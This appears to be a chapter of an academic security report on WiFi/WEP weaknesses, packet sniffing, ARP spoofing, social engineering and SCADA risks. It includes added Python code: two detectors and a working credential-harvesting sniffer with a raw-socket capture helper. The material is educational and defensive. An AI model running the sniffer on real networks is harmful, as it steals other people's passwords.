WiFi network administrators have some options for securing their networks, including MAC address filtering (“whitelisting”) and WEP. Whitelisting requires the administrator to manually enter the Media Access Control (MAC) address of each computer he or she wants to allow. Because a card's MAC address is transmitted in the clear in every frame and can be changed in software, this method is vulnerable to “spoofing” (see below).

Wired Equivalent Privacy (WEP) is a feature of 802.11 networks used to prevent computers that have not been given the WEP key from connecting to the network. Unfortunately, open-source programs are available that can recover WEP keys from captured traffic. AirSnort80 is an example. Its webpage claims that it can crack a WEP key in under a second once the program has been allowed to monitor 5-10 million packets. The weakness lies in the design of WEP itself rather than in any particular key, so changing keys does not help; its successors WPA (2003) and WPA2 (2004) use per-session keys, and a network still protected only by WEP should be treated as no safer than an open one.

Because WiFi is a shared radio medium, every frame sent on a channel can be received by any radio within range, whether or not that radio has joined the network. Most WiFi cards review and ignore frames destined for other nodes, but many feature a “promiscuous mode” that causes the card to pass all frames up to the host, and most 802.11 cards also offer a “monitor mode” that captures raw frames without associating with any network at all. Either may then be coupled with a packet-sniffing program. With WEP the frames are encrypted, but since every member of the network shares the same key, any member (or anyone who has cracked the key) can decrypt all of them.

2.4.3.3 Network Interface Cards and Promiscuous Mode

A Network Interface Card (NIC) is the computer component that connects to a network, either Ethernet or 802.11. With the exception of Ethernet networks with uncompromised switches, both network types deliver all packet traffic on the segment to every NIC. By default, a NIC ignores every frame except those addressed to its own hardware address (and broadcasts); this design is as much for efficiency as for security. Nearly all NICs, however, have the capability of running in “promiscuous mode”.81 With this turned on, the NIC passes every frame it receives to the host, whatever the destination address.

80 Airsnort Homepage. 31 Dec 2004. The Shmoo Group. 30 Oct 2007. <http://airsnort.shmoo.com/>.

2.4.4 Implementations

Once a computer is on a network, the most difficult task is complete. Packet sniffing programs are easy to find, and many are free and open source. They work by putting the NIC in promiscuous mode, then decoding the received packets. Many packet sniffers include parsers for common cleartext protocols that automatically pick out user names and passwords, streamlining the process.

2.4.4.1 Spoofing

The term spoofing refers to a computer misrepresenting its network identity in order to receive data intended for another computer on the network. A computer may spoof a MAC address or an IP address; on a switched LAN the usual form is ARP spoofing, in which the attacker's machine answers ARP requests for another host's IP address (typically the gateway's) so that traffic meant for that host is delivered to the attacker's NIC instead. While this is difficult for an unskilled user to set up, a number of tools are available to hackers who seek it.

2.4.4.2 Limitations and Counters

When one computer spoofs another that is still operational, it creates inconsistencies in the network's traffic, such as two different MAC addresses answering for one IP address, or one MAC address claiming several addresses, that can clue in network administrators and well-designed monitoring programs. Hackers may try to counter this by coupling spoofing with a Denial of Service attack on the spoofed computer, so that only one machine appears to be using that network identity.
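The inconsistency described above is exactly what an ARP-watching monitor looks for. The following is an added example, not code from the original report: it parses ARP replies (constructed here with made-up addresses), keeps an IP-to-MAC table, and raises an alert when a binding changes or when one MAC answers for several addresses. An optional inventory of known-good bindings (for example the gateway) covers the counter-move the text mentions, where the attacker first knocks the real host offline so that no conflicting reply is ever seen.

```python
import struct

# Added example: an ARP-watch style detector for the spoofing inconsistency
# described in the text, run over constructed ARP replies (made-up addresses).

ETH_TYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply 'sender_ip is at sender_mac'."""
    eth = target_mac + sender_mac + struct.pack("!H", ETH_TYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, ARP_REPLY,
                      sender_mac, sender_ip, target_mac, target_ip)
    return eth + arp


def parse_arp_reply(frame):
    """Return (sender_mac, sender_ip) as strings for an IPv4 ARP reply, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_ARP:
        return None
    htype, ptype, _hlen, _plen, oper, sha, spa, _tha, _tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if htype != 1 or ptype != 0x0800 or oper != ARP_REPLY:
        return None
    return mac_str(sha), ip_str(spa)


class ArpWatch:
    """Track IP-to-MAC bindings seen in ARP replies and flag two signs of spoofing:
    a binding that changes, and one MAC answering for several IPs (typical of a
    host inserting itself between a victim and the gateway)."""

    def __init__(self, inventory=None):
        # Known-good bindings (e.g. the gateway) supplied from inventory, so an
        # impostor is caught even if it first silenced the real host with a DoS
        # and no conflicting reply is ever observed.
        self.inventory = dict(inventory or {})
        self.table = {}
        self.alerts = []
        self._reported_multi = set()

    def observe(self, frame):
        parsed = parse_arp_reply(frame)
        if parsed is None:
            return
        mac, ip = parsed
        expected = self.inventory.get(ip, self.table.get(ip))
        if expected is not None and expected != mac:
            self.alerts.append(("changed", ip, expected, mac))
        self.table[ip] = mac
        claimed = tuple(sorted(i for i, m in self.table.items() if m == mac))
        if len(claimed) > 1 and (mac, claimed) not in self._reported_multi:
            self._reported_multi.add((mac, claimed))
            self.alerts.append(("multi", mac, claimed))


# Constructed scenario: gateway and victim answer normally, then an attacker
# answers for both of their addresses.
GW_MAC, GW_IP = bytes.fromhex("aabbcc000001"), bytes([192, 168, 1, 1])
VICTIM_MAC, VICTIM_IP = bytes.fromhex("aabbcc000020"), bytes([192, 168, 1, 20])
ATTACKER_MAC = bytes.fromhex("deadbeef0001")

SAMPLE_REPLIES = [
    build_arp_reply(GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),
    build_arp_reply(VICTIM_MAC, VICTIM_IP, GW_MAC, GW_IP),
    build_arp_reply(ATTACKER_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),   # "I am the gateway"
    build_arp_reply(ATTACKER_MAC, VICTIM_IP, GW_MAC, GW_IP),       # "I am the victim"
]


def run_watch(frames, inventory=None):
    """Feed frames to a fresh ArpWatch and return the alerts it raised."""
    watch = ArpWatch(inventory)
    for frame in frames:
        watch.observe(frame)
    return watch.alerts


if __name__ == "__main__":
    for alert in run_watch(SAMPLE_REPLIES):
        print(alert)
```

The "multi" heuristic is exactly that: a host with several legitimate addresses will trip it, so in practice it is weighted by whether one of the claimed addresses is the gateway. The inventory check is the one that survives the DoS trick, which is why a static list of gateway and server bindings is worth maintaining.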

Though the threat of packet sniffing may seem dire, a number of limitations impede the goals of

hackers and spies. Some of these limitations are inherent to the packet sniffing method, while

others are safety measures that system administrators may take to protect their networks.

Streamed, non-text transfers

Not every data transfer carries readable text. Voice over IP (VoIP) is sometimes described as needing a fixed connection rather than packets, but it is in fact packetized: the audio travels as a stream of small RTP datagrams over UDP, and can be captured like anything else. What makes it harder to exploit is that the payload is compressed audio with no plain-text component. A credential-harvesting sniffer finds nothing in it, and an eavesdropper must capture the whole stream, reassemble it in order, and decode the audio codec before any information can be recovered. Tools exist for that reconstruction, so it is encryption of the media stream, not its packet format, that protects a call.

Secure protocols

HTTP, IMAP, and the other transfer protocols mentioned above are old, despite their ubiquity, and were designed without encryption. Rather than replacing them, Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS) wrap them: HTTPS, IMAPS and POP3S are the same protocols carried inside an encrypted channel, so a sniffer still sees which hosts are talking and how much, but not what they say. Like radio operators in World War II, however, cryptologists must fight to stay one step ahead of hackers trying to defeat their algorithms.

81 Crenshaw, Adrian. A Quick Intro to Sniffers. 30 July 2007. Irongeek.com. 30 Oct 2007. <http://www.irongeek.com/i.php?page=security/AQuickIntrotoSniffers>.

Secure programming

A concept being introduced into software engineering curricula with growing frequency, secure

programming involves incorporating security into the very code of the applications that need to

transfer data across networks.

Some of the advantages of secure programming include encryption of data carried over normally unencrypted transfer protocols like FTP and POP3, or an extra layer of encryption on top of WEP, SSL, etc. Packet sniffers, specifically, reassemble captured packets into streams and search them for readable text such as login commands82, and an extra layer of encryption renders most of these search routines useless, since all they see is ciphertext.
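The sniffer implementation described in section 2.4.4, and the reason the secure-protocol and secure-programming measures above defeat it, can be shown in one piece of code. The following is an added example written for this edition, not code from the original report: a minimal credential-harvesting sniffer that decodes Ethernet/IPv4/TCP headers and searches payloads for POP3 USER/PASS pairs and IMAP LOGIN commands. It is run over constructed frames (all addresses are made up) so it works offline; the last frame is a TLS application-data record with opaque bytes standing in for ciphertext, and yields nothing. The `capture` helper shows where a real Linux capture would come from but is not called.

```python
import re
import struct

# Added example: a minimal credential-harvesting sniffer of the kind described in
# section 2.4.4, run over constructed frames so it works offline. All MAC and IP
# addresses below are made up; the TLS record is an opaque stand-in, not real
# ciphertext.

ETH_TYPE_IPV4 = 0x0800
PROTO_TCP = 6

POP3_USER = re.compile(rb"^USER (\S+)", re.I)
POP3_PASS = re.compile(rb"^PASS (\S+)", re.I)
IMAP_LOGIN = re.compile(rb"^\S+ LOGIN (\S+) (\S+)", re.I)


def build_frame(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, payload):
    """Build an Ethernet II / IPv4 / TCP frame around payload. Checksums are left
    zero: a sniffer reads the data without validating them."""
    eth = dst_mac + src_mac + struct.pack("!H", ETH_TYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                     PROTO_TCP, 0, src_ip, dst_ip)
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0, 5 << 4, 0x18,
                      8192, 0, 0)
    return eth + ip + tcp + payload


def parse_frame(frame):
    """Return (src_ip, dst_ip, src_port, dst_port, payload) for a TCP/IPv4
    frame, or None for anything else."""
    if len(frame) < 14 or struct.unpack("!H", frame[12:14])[0] != ETH_TYPE_IPV4:
        return None
    ip = frame[14:]
    if len(ip) < 20 or ip[9] != PROTO_TCP:
        return None
    ihl = (ip[0] & 0x0F) * 4
    src_ip = ".".join(str(b) for b in ip[12:16])
    dst_ip = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:]
    if len(tcp) < 20:
        return None
    src_port, dst_port = struct.unpack("!HH", tcp[:4])
    payload = tcp[(tcp[12] >> 4) * 4:]
    return src_ip, dst_ip, src_port, dst_port, payload


def extract_credentials(frames):
    """Scan every TCP payload for cleartext POP3 USER/PASS pairs and IMAP LOGIN
    commands, regardless of port. Returns (protocol, server, user, password)."""
    creds = []
    pending_user = {}  # (src_ip, dst_ip, src_port) -> USER seen, PASS not yet
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src_ip, dst_ip, src_port, dst_port, payload = parsed
        flow = (src_ip, dst_ip, src_port)
        for line in payload.split(b"\r\n"):
            m = POP3_USER.match(line)
            if m:
                pending_user[flow] = m.group(1).decode("ascii", "replace")
                continue
            m = POP3_PASS.match(line)
            if m and flow in pending_user:
                creds.append(("pop3", dst_ip, pending_user.pop(flow),
                              m.group(1).decode("ascii", "replace")))
                continue
            m = IMAP_LOGIN.match(line)
            if m:
                creds.append(("imap", dst_ip, m.group(1).decode("ascii", "replace"),
                              m.group(2).decode("ascii", "replace")))
    return creds


def capture(interface, count):
    """Read `count` raw frames from a Linux interface (root required). The NIC
    must already be in promiscuous mode, e.g. `ip link set dev eth0 promisc on`.
    Not called here; the sample below uses constructed frames instead."""
    import socket
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    sock.bind((interface, 0))
    return [sock.recv(65535) for _ in range(count)]


# Constructed sample traffic (made-up addresses).
CLIENT_MAC = bytes.fromhex("001122334455")
SERVER_MAC = bytes.fromhex("66778899aabb")
CLIENT_IP = bytes([192, 168, 1, 20])
MAIL_IP = bytes([203, 0, 113, 10])

SAMPLE_FRAMES = [
    build_frame(CLIENT_MAC, SERVER_MAC, CLIENT_IP, MAIL_IP, 50123, 110, b"USER alice\r\n"),
    build_frame(CLIENT_MAC, SERVER_MAC, CLIENT_IP, MAIL_IP, 50123, 110, b"PASS hunter2\r\n"),
    build_frame(CLIENT_MAC, SERVER_MAC, CLIENT_IP, MAIL_IP, 50124, 143, b"a001 LOGIN bob s3cret\r\n"),
    # The same kind of login wrapped in TLS (IMAPS, port 993): a TLS application_data
    # record header followed by opaque bytes standing in for the ciphertext.
    build_frame(CLIENT_MAC, SERVER_MAC, CLIENT_IP, MAIL_IP, 50125, 993,
                b"\x17\x03\x03\x00\x20" + bytes(range(32))),
]

if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_FRAMES):
        print(cred)
```

Note that the search is port-agnostic on purpose: moving a cleartext service to a non-standard port hides nothing from a sniffer that pattern-matches payloads, whereas the TLS-wrapped connection on port 993 contributes no credentials at all, which is the whole point of the secure-protocol and secure-programming measures above.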

Packet Sniffer detection programs

Packet sniffing programs generate little or no return traffic, instead monitoring the data

passively. As such, they are fairly difficult to detect. Programs like Sniffdet83

, however, can be

used to detect NICs that are running in promiscuous mode. Sniffdet is open source, and free for

anyone to use, though a certain level of computer skill is required to run the program correctly.
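The probe logic described above, as an added example that is not part of the original report or of Sniffdet's own code. Because the real probes only make sense on a live network, the target is modelled by a small `SimulatedHost` class standing in for a NIC hardware filter in front of an IP stack; the class, the frame dictionaries and the addresses are all assumptions of this example. It includes the control probe a practitioner would want (a correctly addressed request), so that a silent host is reported as unreachable rather than as clean.

```python
# Added example: the probe logic used by promiscuous-mode detectors such as
# Sniffdet, run against simulated hosts so it works offline. Real tools send
# these probes on the wire; SimulatedHost stands in for the NIC hardware
# filter and IP stack of a target.

BROADCAST = "ff:ff:ff:ff:ff:ff"
BOGUS_MAC = "ff:ff:ff:ff:ff:fe"  # no NIC filter should accept frames sent here


class SimulatedHost:
    def __init__(self, mac, ip, promiscuous=False, blocks_icmp=False, online=True):
        self.mac, self.ip = mac, ip
        self.promiscuous = promiscuous
        self.blocks_icmp = blocks_icmp  # host firewall drops echo requests
        self.online = online

    def nic_accepts(self, dst_mac):
        """The hardware filter: own unicast address, broadcast, or anything at all
        in promiscuous mode."""
        return self.promiscuous or dst_mac in (self.mac, BROADCAST)

    def receive(self, frame):
        """Reply the IP stack would emit for a frame that reached it, else None.
        The stack checks only the IP-layer target, not the Ethernet destination,
        which is what the bogus-MAC probes exploit."""
        if not self.online or not self.nic_accepts(frame["dst_mac"]):
            return None
        if frame["kind"] == "arp_request" and frame["target_ip"] == self.ip:
            return {"kind": "arp_reply", "src_mac": self.mac}
        if (frame["kind"] == "icmp_echo" and frame["dst_ip"] == self.ip
                and not self.blocks_icmp):
            return {"kind": "icmp_echo_reply", "src_mac": self.mac}
        return None


def probe_host(host):
    """Run a control probe (correct MAC) and two bogus-MAC probes; return a verdict."""
    control = host.receive({"kind": "arp_request", "dst_mac": host.mac,
                            "target_ip": host.ip})
    if control is None:
        return "unreachable"  # nothing can be concluded about a silent host
    answered = {
        "arp": host.receive({"kind": "arp_request", "dst_mac": BOGUS_MAC,
                             "target_ip": host.ip}),
        "icmp": host.receive({"kind": "icmp_echo", "dst_mac": BOGUS_MAC,
                              "dst_ip": host.ip}),
    }
    hits = sorted(name for name, reply in answered.items() if reply is not None)
    return "promiscuous (" + ", ".join(hits) + ")" if hits else "not detected"


if __name__ == "__main__":
    for label, host in [
        ("normal", SimulatedHost("00:11:22:33:44:55", "10.0.0.5")),
        ("sniffer", SimulatedHost("00:11:22:33:44:66", "10.0.0.6", promiscuous=True)),
        ("sniffer behind firewall",
         SimulatedHost("00:11:22:33:44:77", "10.0.0.7", promiscuous=True, blocks_icmp=True)),
    ]:
        print(label, "->", probe_host(host))
```

Running two probe types matters because each can be blocked independently: the firewalled sniffer above is still caught by the ARP probe. A "not detected" result should be read as "no evidence", not as proof that the host is clean.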

Awareness

Perhaps the best way to prevent packet sniffing is to educate the network administrators who set up and run the networks over which sensitive information travels. Adrian Crenshaw mentions simple practices like putting public terminals on separate networks from staff and administrator networks, and setting workstations to lock when not in use.

Packet sniffing works because it is easy for hackers to do. Intelligent network setups and users can make this process much more difficult for hackers with relatively little effort.

2.4.5 Scenarios

2.4.5.1 Public WiFi Service

Many restaurants and cafés offer free WiFi service around their establishments, and users are not even strictly required to be customers. With the exception of vague user agreements, no attempts are made to limit access. An identity thief or hacker might set his or her laptop up within range of the establishment, though not necessarily inside or on the grounds. Meanwhile, a customer checks his or her email over unencrypted POP3. One of the messages is a confirmation email from an online business website, containing the customer’s user name, password, and credit card information, all of which pass over the air in cleartext.

82 Mendis, Surakshan. Packet Sniffing. 2005. SuraSoft. 30 Oct 2007. <http://www.surasoft.com/articles/packetsniffing.php>.

83 De Souza Reis, Ademar, and Filho, Milton Soares. Sniffdet – Remote Sniffer Detector for Linux. 10 Oct 2006. SourceForge.net. 30 Oct 2007. <http://sniffdet.sourceforge.net/>.

2.4.5.2 University Networks

North Carolina State University provides two wireless networks across its campuses, one for

guests, and one for students and staff. However, a resourceful hacker could easily obtain the

username and password from one of the thirty thousand users in the latter category. Running a

packet-sniffing program, he or she would then have access to a significant amount of

information. This could range from credit card information as before, to staff research

performed on government grants.

2.5 Social Engineering

“The weakest link in an information-security chain is often the user because people can be

manipulated.”84

Social engineering combines hacking with classic confidence schemes and other

low-tech methods to obtain user information that may be used in information theft or system

attacks.

Social engineering attacks may be as simple as the 419 (Nigerian) Scams that send probing

emails to thousands of addresses, or complex plans, involving surveillance and target “casing” in

order to best obtain the target’s trust.

2.5.1 Confidence Schemes or Trust and Attack Models

Confidence schemes bring con men to the world of cyber-attacks. Trust and attack models

include constantly evolving scams tailored to each particular target. As the social engineering

hacker learns more about the target or the target’s company, he or she incorporates this

information into exchanges, either phone, email, or conversational, in order to appear more

legitimate. The hacker may pose as a coworker in a large firm, or even a new acquaintance, and

the information gleaned is not always, even rarely, technical in nature. Hobbies, and the names

and birthdays of family members and pets, are commonly used to produce easy-to-remember

passwords.

An extremely simple example of a trust and attack model could take place in a dog park. The

hacker takes a dog to the park and strikes up a conversation with the target, learning the name of

the target’s dog. This information is a popular security question on many major websites,

including Hotmail. Email passwords are particularly useful targets, as even more websites use

password recovery systems that send the old or changed password to the user’s email.

2.5.2 Phishing

Phishing is a term that refers to emails and websites that attempt to gather user information, typically through fraud and spoofing (a spoofed email forges its sender address, and a spoofed website imitates a legitimate one). At their simplest, phishing attacks can simply be used to determine whether email addresses are in active use, and/or whether the user is a likely candidate for social engineering. 419 scams begin in this way, then follow trust and attack models as hackers establish a relationship with the targets and convince them to commit fund transfers.

84 Laribee, Lena, et al. Analysis and Defensive Tools for Social-Engineering Attacks on Computer Systems. Information Assurance Workshop, 2006 IEEE. 388 – 389, 21-23 June 2006.

More elaborate phishing attacks are more specifically targeted. In October of 2006, a number of

employees at Dekalb Medical Center in Decatur, Georgia accidentally downloaded a key-logging

program when they responded to an email spoofed from Dekalb’s domain, dekalb.org, which

claimed that they had been laid off.85

2.5.3 Dumpster Diving

“I have found private numbers for very important people on post-its. Building

security alarm codes. And my personal favorite, payroll account login and

passwords. It amazes me the things people write on these little brightly colored

pieces of paper. They serve their purpose for a short time and are then balled up

and thrown into the trash. How many people think to shred their Post-Its.”86

Provided no other laws are broken in the process, no federal law prohibits dumpster diving. At

the state level, only theft and trespassing laws cover the activity. Most theft laws state that it is

illegal to take “items of value”, and a number of questions have arisen regarding the value of

objects thrown in the trash. Journalists, law enforcement officers, private investigators, and

social engineers all use dumpster diving as an information collection technique.

Only four states require companies to destroy personal information upon disposal.87

Besides

user names and passwords, company trash may yield maps of corporate structures, phone lists,

and interoffice communiqués, all useful for giving social engineering hackers more background

information and, therefore, more legitimacy when phishing or running trust and attack schemes.

2.5.4 Case Studies

Hacker-turned-contractor and writer Kevin Mitnick described a case of a Pakistani militant

named Khalid Ibrahim, who offered money to American hackers to hack into government and

military websites. In a test hack, Ibrahim offered $1,000 to a hacker who used the Internet

handle of “ne0h” to obtain a number of usernames and passwords for a well-known Chinese

engineering university.

ne0h began by finding a kindred hacker among the students of the university, who offered him a number of user accounts with passwords without question. ne0h noticed that many of the users had simply set the password to the user name. From there, the teenaged hacker found another college student through chat rooms and claimed to be looking for friends around the campus. The student responded with a list of email addresses, and ne0h quickly figured out the corresponding user names and passwords.88

85 Garretson, Cara. Spam that delivers a pink slip. ComputerWorld.com. 1 Nov 2006. 26 Nov 2007. <http://computerworld.com/action/article.do?articleId=9004698&command=viewArticleBasic&taxonomyName=security>

86 Grifter. Dumpster Diving – One Man’s Trash… Hack In The Box. 2002. 26 Nov 2007. <http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&order=0&thold=0>

87 Dumpster Diving. Washington State Office of the Attorney General. 26 Nov 2007. <http://www.atg.wa.gov/ConsumerIssues/ID-Privacy/DumpsterDiving.aspx>

2.6 SCADA Systems

Supervisory Control and Data Acquisition (SCADA) systems collect data from sensors that measure physical parameters like flow rate, temperature, or pressure in a factory, infrastructure plant, or other remote location, and send this data to be processed by a central computer. A computer alone is not a SCADA system: most SCADA systems consist of input and output signal hardware, controllers, networks, communications equipment, and a Human-Machine Interface (HMI). HMIs, like the one shown in Figure 2.4, often run on common operating systems like Windows and Linux, which are vulnerable to many types of viruses and other cyber-attacks; these problems are made worse if the operating system is not patched frequently89.

Figure 2.4: A Human-Machine Interface for a steam power plant operating in Windows90

Programmable logic controllers (PLCs) and Remote Terminal Units (RTUs) interface directly with the controlled processes to carry out the operations performed by a SCADA system. These controllers are usually programmed to meet specific process requirements and can often automatically make slight changes to monitored parameters to optimize functionality; for example, an RTU might control the speed of a conveyor belt or the temperature of a holding tank at a chemical plant. RTUs are currently built with redundancies in hardware and communications channels in case of damage to the physical system, and can often operate on their own to handle safety-related problems91. However, despite these automatic failsafes, input from a human operator can change or override these settings at any time92.

88 Mitnick, Kevin, & Simon, William L. (2005). The Art of Intrusion: When Terrorists Come Calling. Indianapolis, IN: John Wiley and Sons, Inc.

89 Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

90 SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007 <http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

2.6.1 Scope of the Threat to SCADA Systems

Currently, SCADA systems are involved in the manufacture of many consumer products, including pharmaceuticals, and in controlling critical infrastructures like electric power generators, water treatment plants, dams, nuclear power plants, and other systems93. According to Joe Weiss of Applied Control Solutions, the industry greatly underestimates what a SCADA attack can do: “What people had assumed in the past is the worst thing you can do is shut things down. And that's not necessarily the case. A lot of times the worst thing you can do, for example, is open a valve -- have bad things spew out of a valve.”94 Manipulating SCADA controls could allow a cyberattacker to accomplish anything from increasing the amount of waste in a local water supply to driving an electric power generator out of step with the grid so that it physically destroys itself. Consequently, the effects of a large-scale cyberattack utilizing remote access to SCADA systems could potentially be disastrous.

Despite the importance of SCADA systems to critical infrastructures, these systems are rarely as safe or as isolated as the industry thinks. Of the 13 cyber-security incidents involving SCADA systems recorded between 1980 and 2000, only 31% originated from outside the company; the rest were either accidents or the work of disgruntled employees who had direct access to the systems95. Between 2001 and 2003, however, the source of cyber-attacks on these systems shifted, with 70% originating from outside the company (Figure 2.5).

91 SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007 <http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

92 "What is SCADA?" The Tech-FAQ. 2007. 27 Oct. 2007 <http://www.tech-faq.com/scada.shtml>.

93 "Multi-State Information Sharing and Analysis Center (MS-ISAC)." 2006. Multi-State Information Sharing and Analysis Center (MS-ISAC). 21 Oct. 2007 <http://www.msisac.org/scada/>.

94 Meserve, Jeanne. "Sources: Staged Cyber Attack Reveals Vulnerability in Power Grid." CNN 26 Sept. 2007. 27 Sept. 2007 <http://www.cnn.com/2007/US/09/26/power.at.risk/index.html>.

95 Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

Figure 2.5: Origin of SCADA-related cyber-attacks96

While the proportion of SCADA incidents attributed to inside sources is decreasing markedly, the proportion attributed to external attackers is increasing correspondingly. A falling insider share does not mean the insider threat has gone away, and both must be considered when making policy decisions.

2.6.2 Vulnerabilities

2.6.2.1 Original Development Flaws

Many SCADA systems are vulnerable to cyber-attacks, and this stems from the way in which they were originally developed. The first SCADA systems were developed over twenty years ago, before the majority of other corporate networks were put into place, and many of these original SCADA systems are still in use today. This leads many information technology managers to believe that these networks are not linked, so that SCADA systems cannot be accessed through corporate networks or remote access points. In reality, many corporate IT networks and SCADA systems are linked so that engineers can control systems from remote points on the corporate network and managers can find critical data instantly. IT managers usually make these connections without a full understanding of the security risks, and the security policies of most corporations do not account for the possibility that SCADA systems could be accessible through other corporate networks97.

96 Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

97 Understanding SCADA System Security Vulnerabilities. Riptech. 2001. 1-5. 23 Oct. 2007 <http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>.

2.6.2.2 Corporate Network Security

Research into the security of corporate networks produces startling results. Independent security researcher Shawn Merdinger discovered in 2006 that at least a handful of critical infrastructure companies whose staff planned to attend the DEFCON hacking conference in Las Vegas were connecting to the Internet using residential routers with documented vulnerabilities. Merdinger described these systems as being “almost as secure as my mom's computer.”98 This is particularly alarming because, as long as these corporate networks are unprotected, the SCADA systems linked to them are equally vulnerable. Other basic problems in companies’ network architecture include FTP or email servers misconfigured so that they inadvertently allow internal network access, unsecured connections with corporate partners, and failure to implement firewalls and other network security measures internally, which leaves little to no separation between different sectors of the network99.

This unawareness of network security flaws creates an even bigger problem, because SCADA systems were not originally designed with cyber-security in mind. Alan Paller, director of research for the SANS Institute, said of these design flaws, “It's not that these guys don't know what they are doing. Part of it is that these systems were engineered 20 years ago, and part of it is that the engineers designed these things assuming they would be isolated. But--wham!--they are not isolated anymore.”100 One consequence is that old SCADA systems are not patched with security updates the way corporate IT systems are, and cannot be protected independently by such measures. Because they were intended to be isolated, there are many basic security shortcomings built into SCADA systems as well, such as the absence of per-user authentication: operators share accounts with easily guessed names like “admin” rather than logging in with a personal user ID101. This flaw not only makes it easier to infiltrate SCADA systems, but also makes the infiltrator much harder to track, since all users utilize the same login information.

2.6.2.3 Company Security Procedures

The weaknesses of SCADA systems often go beyond engineering design flaws into company security procedures as well. Many companies list data on their websites that can be useful for hackers, such as email addresses, employee names, and sometimes even corporate network system names. This exposure could largely be reduced simply by removing information that could be useful to hackers from company websites.

98 Lemos, Robert. "SCADA System Makers Pushed Toward Security." SecurityFocus 26 July 2006. 19 Oct. 2007 <http://www.securityfocus.com/news/11402/2>.

99 Understanding SCADA System Security Vulnerabilities. Riptech. 2001. 1-5. 23 Oct. 2007 <http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>.

100 Lemos, Robert. "SCADA System Makers Pushed Toward Security." SecurityFocus 26 July 2006. 19 Oct. 2007 <http://www.securityfocus.com/news/11402/2>.

101 SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007 <http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

2.6.2.4 Who Could Gain Access?

Without increased security measures, anyone with a basic knowledge of hacking could theoretically gain access to a SCADA system. Of the security incidents recorded between 2000 and 2003, the Internet was the single largest source, but security was also breached through other routes, like wireless systems, dial-up connections, and third party connections (Figure 2.6). Therefore, simply implementing measures to close off one access point, like an Internet firewall, is insufficient: as many entry points as possible should be protected102.

Figure 2.6: Entry points of SCADA-related cyber-attacks103

Because many companies lack knowledge about their own cyber-security vulnerabilities, infiltrating a SCADA system would not require a targeted assault from a country or terrorist organization: just one “average” hacker would be skilled enough to gain access. For example, in one penetration test described by David Maynor and Robert Graham at Black Hat Federal 2006, a single tester was able to find an unprotected WiFi access point and infiltrate the SCADA system using a ten-year-old exploit of Solaris, the Unix-based operating system on which the SCADA system was running104. Since the United States military invasion of Afghanistan in 2001, US forces have seized computers and instruction manuals containing SCADA information relating to dams from Al Qaeda training camps, although they found no evidence of an actual plan to attack105.

102 Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

103 Byres, Eric, and Justin Lowe. The Myths and Facts Behind Cyber Security Risks for Industrial. British Columbia Institute of Technology. 1-6. 15 Oct. 2007 <http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

104 SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007 <http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

2.6.3 Case Studies

2.6.3.1 Hunter Watertech

In early 2000, Vitek Boden, a disgruntled former employee of the contractor Hunter Watertech, infiltrated the sewage control system that Hunter Watertech had installed for the Maroochy Shire Council in Queensland, Australia, using only a stolen computer and radio transmitter; he was arrested on April 23, 2000. From an external site, he entered the system by using software to identify himself as “pumping station 4” and deactivated alarms that would have alerted operators to his presence in the system. Though he was familiar with the system, all the equipment he used was commercially available, and he faced no obstacles when accessing the network, which accepted radio commands without any authentication106.

